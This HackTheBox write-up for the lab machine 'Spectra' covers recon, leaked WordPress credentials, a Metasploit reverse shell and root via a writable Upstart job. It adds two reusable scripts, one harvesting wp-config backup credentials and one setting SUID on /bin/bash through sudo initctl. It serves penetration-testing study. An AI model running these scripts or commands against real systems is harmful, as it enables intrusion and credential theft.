Spectra | HackTheBox Writeup

Overview

Spectra is an easy Linux-based machine on HackTheBox by egre55.

User Part

Starting with an Nmap scan, I found 4 open ports:

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-20 12:20 EDT
Nmap scan report for spectra.htb (10.10.10.229)
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp open http nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8081/tcp open blackice-icecap?
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Sun, 20 Jun 2021 16:20:33 GMT
| Connection: close
| Hello World
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Sun, 20 Jun 2021 16:20:40 GMT
| Connection: close
|_ Hello World
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8081-TCP:V=7.91%I=7%D=6/20%Time=60CF6AD1%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/plain\r\nD
SF:ate:\x20Sun,\x2020\x20Jun\x202021\x2016:20:33\x20GMT\r\nConnection:\x20
SF:close\r\n\r\nHello\x20World\n")%r(FourOhFourRequest,71,"HTTP/1\.1\x2020
SF:0\x20OK\r\nContent-Type:\x20text/plain\r\nDate:\x20Sun,\x2020\x20Jun\x2
SF:02021\x2016:20:33\x20GMT\r\nConnection:\x20close\r\n\r\nHello\x20World\
SF:n")%r(HTTPOptions,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/p
SF:lain\r\nDate:\x20Sun,\x2020\x20Jun\x202021\x2016:20:40\x20GMT\r\nConnec
SF:tion:\x20close\r\n\r\nHello\x20World\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 178.93 ms 10.10.14.1
2 349.92 ms spectra.htb (10.10.10.229)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.02 seconds

The website on port 80 is an issue tracker that isn't fully configured yet.

Checking the source code reveals the DNS name spectra.htb, which I added to /etc/hosts.

<h2><a href="http://spectra.htb/main/index.php" target="mine">Software Issue Tracker</a></h2>
<h2><a href="http://spectra.htb/testing/index.php" target="mine">Test</a></h2>

The website at /main/ shows it's a WordPress site.

I checked it with wpscan, but found nothing interesting other than the username (administrator).

Running ffuf shows 2 directories:

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://spectra.htb/FUZZ

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v1.3.0-dev
________________________________________________

:: Method : GET
:: URL : http://spectra.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________

main [Status: 301, Size: 169, Words: 5, Lines: 8]
testing [Status: 301, Size: 169, Words: 5, Lines: 8]
:: Progress: [20475/20475] :: Job [1/1] :: 177 req/sec :: Duration: [0:02:01] :: Errors: 0 ::

The /testing/ directory has directory listing enabled and exposes these files, so let's check the config file:

Index of /testing/

../
wp-admin/ 10-Jun-2020 23:00 -
wp-content/ 10-Jun-2020 23:13 -
wp-includes/ 10-Jun-2020 23:13 -
index.php 06-Feb-2020 06:33 405
license.txt 10-Jun-2020 23:12 19915
readme.html 10-Jun-2020 23:12 7278
wp-activate.php 06-Feb-2020 06:33 6912
wp-blog-header.php 06-Feb-2020 06:33 351
wp-comments-post.php 02-Jun-2020 20:26 2332
wp-config.php 28-Oct-2020 05:52 2997
wp-config.php.save 29-Jun-2020 22:08 2888
wp-cron.php 06-Feb-2020 06:33 3940
wp-links-opml.php 06-Feb-2020 06:33 2496
wp-load.php 06-Feb-2020 06:33 3300
wp-login.php 10-Feb-2020 03:50 47874
wp-mail.php 14-Apr-2020 11:34 8509
wp-settings.php 10-Apr-2020 03:59 19396
wp-signup.php 06-Feb-2020 06:33 31111
wp-trackback.php 06-Feb-2020 06:33 4755
xmlrpc.php 06-Feb-2020 06:33 3133

Opening wp-config.php and wp-config.php.save in the browser shows nothing.

But viewing the page source of wp-config.php.save reveals the database username and password: the .save copy is not executed as PHP, so the server returns its raw source, and the browser simply hides the <?php ... ?> block when rendering it.

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
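As an added example (not part of the original writeup), here is a small shell script that automates the check above: it lists backup/editor suffixes commonly left beside wp-config.php, fetches each candidate, and extracts the DB_USER/DB_PASSWORD/DB_HOST defines from any copy the server returns as plain text. The suffix list is an assumption, the sample wp-config excerpt inside it is constructed for the example, and the target URL is passed on the command line.

```shell
#!/bin/sh
# Added example, not from the original writeup: hunt for backup copies of
# wp-config.php that the web server serves as plain text, and pull the DB
# credentials out of them. Run as: sh wpconfig-backups.sh http://spectra.htb/testing

# Backup/editor suffixes commonly left next to wp-config.php.
# The list is an assumption; extend it as needed.
backup_variants() {
  # $1 = base file name, e.g. wp-config.php
  for suffix in .save .bak .old .orig .swp '~' .txt .dist; do
    printf '%s%s\n' "$1" "$suffix"
  done
}

# Read wp-config style PHP on stdin and print DB_USER/DB_PASSWORD/DB_HOST as
# KEY=value lines. Only single-quoted define() values are handled.
extract_db_creds() {
  sed -En "s/^[[:space:]]*define\([[:space:]]*'(DB_USER|DB_PASSWORD|DB_HOST)'[[:space:]]*,[[:space:]]*'([^']*)'[[:space:]]*\);.*/\1=\2/p"
}

# Fetch each candidate under $1 and report any that leak credentials.
# $1 = URL of the directory that holds wp-config.php (no trailing slash)
probe_backups() {
  backup_variants wp-config.php | while read -r name; do
    # -f makes curl fail on 404/403 instead of handing us an error page
    body=$(curl -s -f "$1/$name") || continue
    if printf '%s\n' "$body" | grep -q "DB_PASSWORD"; then
      echo "[+] $1/$name is served as plain text and leaks:"
      printf '%s\n' "$body" | extract_db_creds
    fi
  done
}

# Constructed sample of what a leaked wp-config.php.save looks like,
# embedded so the parser can be exercised offline.
sample_wp_config() {
  cat <<'EOF'
<?php
/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
EOF
}

# Offline demo against the embedded sample, then the live probe if a URL is given.
sample_wp_config | extract_db_creds
if [ -n "${1:-}" ]; then
  probe_backups "${1%/}"
fi
```

Against this box, only the .save variant exists, but the same script catches the .bak and editor-swap leftovers that turn up on other WordPress installs behind nginx, where only files ending in .php are passed to PHP.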

I logged in to the WordPress dashboard at /main/ with the username found by wpscan (administrator) and this database password, which is reused for the WordPress account.

I used Metasploit's wp_admin_shell_upload module to get a shell (the first exploit attempt fails because I mistyped RHOSTS as spectra.thm):

msf6 > use exploit/unix/webapp/wp_admin_shell_upload 


msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS spectra.thm
RHOSTS => spectra.thm
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
TARGETURI => /main/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.32
LHOST => 10.10.14.32
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[-] Exploit failed: One or more options failed to validate: RHOSTS.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.229
RHOSTS => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.32:4444
[*] Authenticating with WordPress using administrator:devteam01...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /main/wp-content/plugins/pkfCHkQzWW/afpmMkJCbG.php...
[*] Sending stage (39282 bytes) to 10.10.10.229
[+] Deleted afpmMkJCbG.php
[+] Deleted pkfCHkQzWW.php
[+] Deleted ../pkfCHkQzWW
[*] Meterpreter session 1 opened (10.10.14.32:4444 -> 10.10.10.229:38918) at 2021-06-20 14:45:53 -0400

meterpreter >

I uploaded linpeas and, checking for privilege escalation, got this. The password is stored in cleartext in /etc/autologin/passwd:

[+] Autologin Files
/home/nginx/.pki/nssdb/key4.db
/etc/autologin

/etc/autologin/passwd
-rw-r--r-- 1 root root 19 Feb 3 16:43 /etc/autologin/passwd
SummerHereWeCome!!

/etc/init/autologin.conf
-rw-r--r-- 1 root root 978 Feb 3 16:42 /etc/init/autologin.conf

Using that password I can log in as katie over SSH:

ssh katie@10.10.10.229
Password:
katie@spectra ~ $

Root Part

Then I checked which commands I can run with sudo:

katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
(ALL) SETENV: NOPASSWD: /sbin/initctl
katie@spectra ~ $

I searched Google for initctl privilege escalation and found an article on it.

As per the article, I first listed the current status of the Upstart jobs:

katie@spectra /etc/init $ sudo /sbin/initctl list
crash-reporter-early-init stop/waiting
cups-clear-state stop/waiting
dbus_session stop/waiting
failsafe-delay stop/waiting
fwupdtool-activate stop/waiting
send-reclamation-metrics stop/waiting
smbproviderd stop/waiting
tpm_managerd start/running, process 818
udev start/running, process 240
test stop/waiting
test1 stop/waiting
autologin stop/waiting
boot-services start/running
cryptohome-proxy stop/waiting
cryptohomed-client stop/waiting

There is a test job defined in /etc/init/test.conf, and that file is writable by katie, so I edited its script block to run chmod +s /bin/bash. initctl runs the job as root, so starting the job applies the change as root.

I started the service:

katie@spectra /etc/init $ sudo /sbin/initctl start test

test start/running, process 3936

katie@spectra /etc/init $

After starting the job, /bin/bash has the SUID bit set, so I can run it as root:

katie@spectra /etc/init $ ls -la /bin/bash
-rwsr-sr-x 1 root root 551984 Dec 22 05:46 /bin/bash
katie@spectra /etc/init $

I got the root flag:

katie@spectra /etc/init $ /bin/bash -p
bash-4.3# cat /root/root.txt
d44519713b889d5e1f9e536d0c6df2fc
bash-4.3#
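The edit-and-restart sequence above, written out as a script. This is an added example, not the writeup's own commands: it assumes the job file is /etc/init/test.conf, that katie can write it, and that sudo runs /sbin/initctl without a password, as the sudo -l output shows. The upstart_job function generates the replacement job, whose script block Upstart runs as root.

```shell
#!/bin/sh
# Added example, not from the original writeup: escalate via a writable
# Upstart job when sudo allows /sbin/initctl. Assumptions: the job is
# /etc/init/test.conf, the current user can write it, and
# "sudo /sbin/initctl" needs no password.
# Run as: sh initctl-privesc.sh run

JOB=${JOB:-/etc/init/test.conf}
JOB_NAME=$(basename "$JOB" .conf)

# Print an Upstart job whose script block runs $1. Upstart executes the
# script as root when the job is started, regardless of who edited the file.
# "task" makes "initctl start" block until the script has finished.
upstart_job() {
  cat <<EOF
description "test job rewritten to run a command as root"
task

script
    $1
end script
EOF
}

# True when the setuid bit is set on $1.
has_setuid() {
  [ -u "$1" ]
}

# Rewrite the job, bounce it through sudo initctl, verify, then spawn a
# shell that keeps the effective uid (bash -p).
exploit() {
  [ -w "$JOB" ] || { echo "[-] $JOB is not writable" >&2; return 1; }
  cp "$JOB" "/tmp/${JOB_NAME}.conf.bak"          # keep a copy to restore later
  upstart_job 'chmod +s /bin/bash' > "$JOB"
  sudo /sbin/initctl stop "$JOB_NAME" 2>/dev/null || true   # ignore "already stopped"
  sudo /sbin/initctl start "$JOB_NAME"
  has_setuid /bin/bash || { echo "[-] /bin/bash is not setuid" >&2; return 1; }
  echo "[+] /bin/bash is setuid root, spawning privileged shell"
  exec /bin/bash -p
}

if [ "${1:-}" = "run" ]; then
  exploit
fi
```

The -p flag matters: without it bash drops the effective uid back to the real uid on startup, and the setuid bit buys nothing. Restore the backed-up job file afterwards so the box is left as found.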
 